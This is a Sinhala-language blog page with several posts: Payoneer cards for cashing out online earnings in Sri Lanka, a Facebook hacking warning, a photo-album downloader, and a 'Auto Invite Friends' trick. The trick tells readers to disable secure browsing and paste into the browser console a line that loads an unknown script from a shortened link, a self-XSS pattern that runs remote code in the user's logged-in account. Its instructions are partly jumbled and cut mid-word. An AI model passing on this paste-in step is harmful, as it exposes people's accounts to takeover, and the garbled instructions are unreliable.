Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts

ඔබ අන්තර්ජාලයෙන් උපයන මුදල් ලංකාවෙදි සල්ලි කරගන්නෙ කොහොමද?

Master Card Srilanka

ඇඩ්සෙන්ස් හැරුනහම වෙනත් ෆ්‍රීලන්සර් වගේ සයිට් වලින් උපයන මුදල් ලංකාවට ගෙන්න ගන්නෙ කෙහොමද? මේකට ක්‍රම කිහිපයක්ම තියෙනව. 
  1. චෙක්පත් මගින් (Bank Check)
  2. ඩෙබිට් හා ක්‍රෙඩිට් කාඩ්පත් මගින් (Visa , Master Card)
  3. පයනීර් මාස්ටර් කාඩ් එකක් මගින් (Payoneer MasterCard)
ගොඩක් අය හිතන්නෙ පේපල් ගිනුමක් හදාගෙන ඒකෙන් මුදල් ලංකාවට ගන්න පුලුවන් කියල, එත් ඒක එච්චරම ලේසි නැහැ. මොකද පේපල් වල සියලු පහසුකම් ලංකාවට දීල නැහැ. ඒ නිසා අපට පේපල් තුලින් ලංකාවට මුදල් ගෙන්න ගන්න නීත්‍යානුකූල ක්‍රමයක් නැහැ. (හොරට ගෙන්න ගන්න බැරිකමකුත් නෑ)
මේ දවස්වල ඔයාල apply කරොත් $25 ක බෝනස් එකක් ලැබෙනව. (ඒක ලැබෙන්නෙ ඔයාලගේ ගිනුමට $100 ක් දැම්මට පස්සෙ විතරයි.)
මුල්න්ම ඔයාල Payoneer කාඩ් එකක් හදාගන්න ඕන. මේ කාඩ් ලබාදෙන්නෙ පහලින් තියෙන බැංකු වලින්. මගෙ එකනම් ආවෙ First Century Bank එකෙන්. 
  • Choice Bank.
  • First Covenant Bank.
  • First Century Bank. 
ඒක දෙන්නෙ නිකම්. හැබැයි කාඩ් එක නිකම්ම ගෙදරට එව්වට ඒක ඇක්ටිව් කරගන්න ටිකක් වියදම් කරන්නත් වෙනව. එහෙම කරන්න බැරිනම් කාඩ් එකට ඉල්ලුම් නොකර ඉන්න එක ලංකාවට හොදයි. මොකද කාඩ් දෙන්නෙ ඒ බැංකු යමක් බලාපොරොත්තුවෙන්, ලංකාවෙ අය කාඩ් අරන් නාස්ති කරොත් මේක ලංකාවට තහනම් කරන්නත් පුලුවන් සමහරවිට.

Payoneer කාඩ් එකකින් ඔබට ඇති වාසි,
  1. කෙලින්ම Payoneer වලට සමහර සයිට් වලින් Withdraw කිරීමට ඇති හැකියාව.
  2. 100% නීත්‍යානුකූලයි.
  3. ලංකාවේ ඕනෑම ATM යන්ත්‍රයකින් මුදල් ලබා ගැනීමට හැකි වීම.
  4. Paypal වලට නොගෙවන මුදල් ලබා ගැනීම.
  5. පේපල් වල මුදල් ලංකාවේ ATM හරහා ලබා ගැනීම.
  6. Online pay , Shopping , ebuy කිරීමට අවස්ථාව ලැබීම.
  7. අවම Card fees.

  • කාඩ් එක සක්‍රිය කිරීමේ ගාස්තුව - $12.99
  • අලුත් කාඩ්පතක් ලබාගැනීමේදී (Replace)- $12.99 
  • සාමාන්‍ය මුදල් දැමීමකදී $2.00 දින දෙකකින් යනව.(දිගින් දිගටම මුදල් දැමීමේදී මෙහි අගය අඩු වේ.)
  • හදිසි මුදල් දැමීමකදී $5.00 පැය දෙකක් ඇතුලට කාඩ් එකට ලොඩ් වෙනවා.
  • කාඩ් එකේ දිගින් දිගටම සල්ලි තිබුනොත් නඩත්තු ගාස්තු වශයෙන් $3 ක් කැපෙනවා.
  • ATM තුලින් මුදල් ගැනීමේදී $3ක් කැපෙනවා.
  • කාඩ් එකේ තියෙන ගාන බලන්න $1.
  • Online Purchase කිරීම Free.
දැන් සල්ලි අතට ගන්න හරිම ලේසියි.
පේපල් වල තියෙන මුදල් Payoneer වලට යවන්න > Payoneer Master Card එකට Load කරන්න > ලංකාවේ ATM එකකින් මුදල් කරගන්න


කාඩ් එකට ඇප්ලයි කරනකොට සේරම ඇත්ත තොරතුරු දෙන්න.
මෙතනින් ගිහින් ඇප්ලයි කරන්න - Payoneer-Apply
  • උපන් දිනේ හරියට දාන්න.
  • National ID එකේ තියෙන විදිහට නම ලියන්න.
  • Last Name එකට වාසගම දාන්න.
  • ගෙදර Address එක හරියට දාන්න.
  • දුරකථන අංකය දෙන්න.
  • Security Question එකට දාන ප්‍රශ්ණය හොඳට මතක තියාගන්න.
  • Username එකයි, Password එකයි, Security Question එකයි ස්ක්‍රීන් ෂොට් එකක් දාගන්න. නැත්තම් කොහෙහරි ලියාගන්න.
සතියකින් දෙකකින් වගේ ගෙදරට ලියුමක් එයි. කාඩ් එකත් එක්ක අමුනල එවල තියන ලිවුමෙ කාඩ් එක ඇක්ටිව් කරගන්න විස්තරේ තියෙනව. 


Think bit before you login to Facebook

some problems about Facebook such as hacked, dismissed own photos to other sites. Think of this before login to Facebook. The Facebook is a website that most of people are login. like wise, related to Facebook we can hear that most of the peoples are saying that the Facebook account gas been hacked or photos related to one's account has been entered to other websites.   And the real situation is more than 85% of the Sri-Lankan has not identify still what internet is. They only know how to log-on Facebook, to read their E-mails and to search on Google and some other but some times, actually they don't know even how to log on Facebook correctly.  දනුක සොන්
Facebook is a common web site today. and also occur some problems about Facebook such as hacked, dismissed own photos to other sites. Think of this before login to Facebook. The Facebook is a website that most of people are login. like wise, related to Facebook we can hear that most of the peoples are saying that the Facebook account gas been hacked or photos related to one's account has been entered to other websites.


And the real situation is more than 85% of the Sri-Lankan has not identify still what internet is. They only know how to log-on Facebook, to read their E-mails and to search on Google and some other but some times, actually they don't know even how to log on Facebook correctly.

Auto Invite Friends in Facebook Group 2012


ඔබ දන්නවා facebook group එකකට සාමාජිකයන් එකතු කල යුතු නම් එකින් එක නම් ඇතුලත් කරමින් මිතුරන් එකතු කල යුතුය. මේ එම කාර්යය වෙහෙසකින් තොරව වඩාත් ඉක්මනින් හා පහසුවෙන් කරගත හැකි එකම ක්‍රමයයි. 

Auto Invite Friends in Facebook Group 2012


 * ඔබගේ ෆේස්බුක් ගිණුමට ලොග් වන්න .

* Account setting > Security > තුලට ගොස්  Secure browsing off කරන්න.
  * මීලගට මිතුරන් එකතු කල යුතු group එකට යන්න.
 * පහත ඉරි අතර ඇති සම්පුර්ණ code එකම copy කරගන්න.

document.body.appendChild(document.createElement('script')).src='http://goo.gl/HY9ya';

මෙය භාවිතා කරන ආකාරය

 Google Chrome හා Mozilla Firefox වෙබ් බ්‍ර
ව්පහත දැක්වේ.

 Google Chrome භාවිතා කරන අය පහල පියවර අනුගමනය කරන්න.

 Right Click කරන්න.
3. "Inspect Element" යන්

1. යාළුවන්ව එකතු කරන්න ඕන කරන ගෲප් එකට යන්න.
2. Page එකේ ඔබ කැමති තැන
කන තෝරා ඉන් පසු "Console" තෝරන්න.
 4. පහත දී තිබෙන Script Code එක Copy කර Paste කරන්න.
නය කරන්න.
යාළුවන්ව එකතු කරන්න ඕන කරන
5. Ctrl + v යතුරු එකවර එබීමෙන් past වේ.


Mozilla Firefox භාවිතා කරන අය පහල ක්‍රමය අනුග
ම ගෲප් එකට යන්න.
2. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
 3. පහත දී තිබෙන Script Code එක Copy කර Paste කරන්න.

4. Ctrl + v යතුරු එකවර එබීමෙන් past වේ.

How to Download Facebook Photo Albums

How can you download Facebook albums? Everyone’s on Facebook these days and many of our interactions with our friends are around sharing and commenting on photos. Uploading photos to Facebook is easy, but do you know how to download Facebook photo albums?

Facebook2zip is a free service that allows you to backup your facebook profile
downloading all your photos into a single zip archive!

You can also download all of your friends' photos in the same way!

Try it! It's free.
-->

You will be redirected to the script in

seconds